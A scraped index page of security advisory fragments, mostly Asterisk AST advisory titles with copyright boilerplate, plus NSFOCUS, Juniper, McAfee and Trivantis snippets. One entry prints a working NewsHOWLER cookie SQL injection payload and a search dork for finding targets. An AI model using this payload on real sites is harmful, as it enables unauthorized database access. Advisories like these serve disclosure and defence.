New User, Welcome!     Login

<< Previous Next >>

All Rights Reserved

AST-2009-009: Cross-site AJAX request vulnerability

   |-----------------------+-------------------+----------------------------|
   | October 29, 2009      | Joshua Colp       | Initial release            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-009
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2009-006: IAX2 Call Number Resource Exhaustion

   |------------------+----------------------+------------------------------|
   | 2009-09-03       | Russell Bryant       | Initial release              |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-006
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2006,2007 Wojciech Purczynski
Copyright (c) 2007 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.

AST-2009-007: ACL not respected on SIP INVITE

   |------------------------+------------------+----------------------------|
   | October 26, 2009       | Jeff Peeler      | Initial release            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-007
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2011-001: Stack buffer overflow in SIP channel driver

                                Revision History
         Date                 Editor                  Revisions Made          
   2011-01-18        Matthew Nicholson        Initial Release                 

               Asterisk Project Security Advisory - AST-2011-001
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2009-008: SIP responses expose valid usernames

   |-----------------------+-------------------+----------------------------|
   | November 4, 2009      | Joshua Colp       | Initial release            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-008
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2007-026 - SQL Injection issue in cdr_pgsql

   |-----------------+------------------------+-----------------------------|
   | 2007-11-29      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-026
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Beta.tgz
#                                                                                   #
#DORK : "Net Dupe © 2002. All Rights Reserved"                                      #
#                                                                                   #
#####################################################################################
#                                   [Exploit]                                       #
#                                                                                   #
#javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";

AST-2011-013: Possible remote enumeration of SIP endpoints with differing NAT settings

                                Revision History
           Date                 Editor                 Revisions Made         

               Asterisk Project Security Advisory - AST-2011-013
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2007-022: Buffer overflows in voicemail when using IMAP storage

    |--------------------+---------------------------+-----------------------|
    | October 9, 2007    | mmichelson@digium.com     | Initial Release       |
    +------------------------------------------------------------------------+

                Asterisk Project Security Advisory - AST-2007-022
               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
   Permission is hereby granted to distribute and publish this advisory in its
                            original, unaltered form.

AST-2011-014: Remote crash possibility with SIP and the “automon” feature enabled

                                Revision History
           Date                 Editor                 Revisions Made         

               Asterisk Project Security Advisory - AST-2011-014
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

NSFOCUS SA2007-02 : Cisco Security Agent Remote Buffer Overflow Vulnerability

INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2007 NSFOCUS. All Rights Reserved. Terms of use.

NSFocus Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

AST-2008-006 - 3-way handshake in IAX2 incomplete

   |---------------------+----------------------+---------------------------|
   | April 22, 2008      | Tilghman Lesher      | Initial release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-006
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2009-005: Remote Crash Vulnerability in SIP channel driver

   |---------------------+----------------------+---------------------------|
   | August 10, 2009     | Tilghman Lesher      | Initial release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-005
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

Juniper Advisory

                Version: 6.2.0r1.0 (Firewall+VPN)

                ScreenOS WebUI
                Copyright © 1997-2008 Juniper Networks, Inc.
                All Rights Reserved.


                For the latest technical information visit:
                http://www.juniper.net

AST-2009-003: SIP responses expose valid usernames

   |-----------------+------------------------+-----------------------------|
   | 2009-04-02      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-003
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2011-012: Remote crash vulnerability in SIP channel driver

                                Revision History
           Date                 Editor                 Revisions Made         

               Asterisk Project Security Advisory - AST-2011-012
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2007-021: Crash from invalid/corrupted MIME bodies when using voicemail with IMAP storage

   |----------------------+---------------------+---------------------------|
   | August 24, 2007      | Mark Michelson      | Initial Release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-021
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2012-005: Heap Buffer Overflow in Skinny Channel Driver

                                Revision History
          Date                  Editor                 Revisions Made         
    04/16/2012         Matt Jordan               Initial Release              

               Asterisk Project Security Advisory - AST-2012-005
              Copyright (c) 2012 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

+ Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338

An unrecoverable error has occurred.
Please report this message to your system administrator.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Exit
©2006 Trivantis Corporation. Trivantis and CourseMill are registered trademarks of Trivantis. All Rights Reserved.

EXPLOITATION:
=============
Exploiter Beta from WatchFire's AppScan eXtensions Framework can be used to pull ALL data from the underlying database.

AST-2007-024 - Fallacious security advisory spread on the Internet involving buffer overflow in Zaptel's sethdlc application

    | 10/31/2007 | Mark Michelson | Changed severity, description, and       |
    |            |                | resolution                               |
    +------------------------------------------------------------------------+

                Asterisk Project Security Advisory - AST-2007-024
               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
   Permission is hereby granted to distribute and publish this advisory in its
                            original, unaltered form.

AST-2007-027 - Database matching order permits host-based authentication to be ignored

   |-----------------+------------------------+-----------------------------|
   | 2007-12-18      | Tilghman Lesher        | Initial Release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-027
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution Vulnerability

    InternalName:     MVT.dll
    OriginalFilename: MVT.dll
    ProductVersion:   6.3.0.1911
    FileVersion:      6.3.0.1911
    FileDescription:  McAfee, Inc.
    LegalCopyright:   ©2011 McAfee, Inc. All Rights Reserved.


//rgod

original url: http://retrogod.altervista.org/9sg_mcafee_vt_adv.htm

AST-2011-006: Asterisk Manager User Shell Access

                                Revision History
          Date                 Editor                  Revisions Made         
   4/21/11            Matthew Nicholson        Initial version                

               Asterisk Project Security Advisory - AST-2011-006
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2010-002: Dialplan injection vulnerability

   |-----------------+--------------------+---------------------------------|
   | 16/02/10        | Leif Madsen        | Initial release                 |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2010-002
              Copyright (c) 2010 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

/home/putnopvut/asa/AST-2008-007/AST-2008-007: AST-2008-007 Cryptographic keys generated by OpenSSL on Debian-based systems compromised

   |-------------------+----------------------+-----------------------------|
   | May 15, 2008      | Mark Michelson       | Initial advisory            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-007
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2008-012: Remote crash vulnerability in IAX2

   |--------------------+-----------------+---------------------------------|
   | December 9, 2008   | Mark Michelson  | Added "Corrected In" versions   |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-012
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2009-010: RTP Remote Crash Vulnerability

   |------------------+---------------------+-------------------------------|
   | 2009-09-03       | David Vossel        | Initial release               |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-010
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

NSFOCUS SA2007-01 : Microsoft IE5 CSS Parsing Memory Corruption Vulnerability

INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2007 NSFOCUS. All Rights Reserved. Terms of use.


NSFocus Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

AST-2012-003: Stack Buffer Overflow in HTTP Manager

                                Revision History
          Date                  Editor                 Revisions Made         
    03-15-2012         Matt Jordan               Initial release              

               Asterisk Project Security Advisory - AST-2012-003
              Copyright (c) 2012 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.
<<Previous Next>>

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!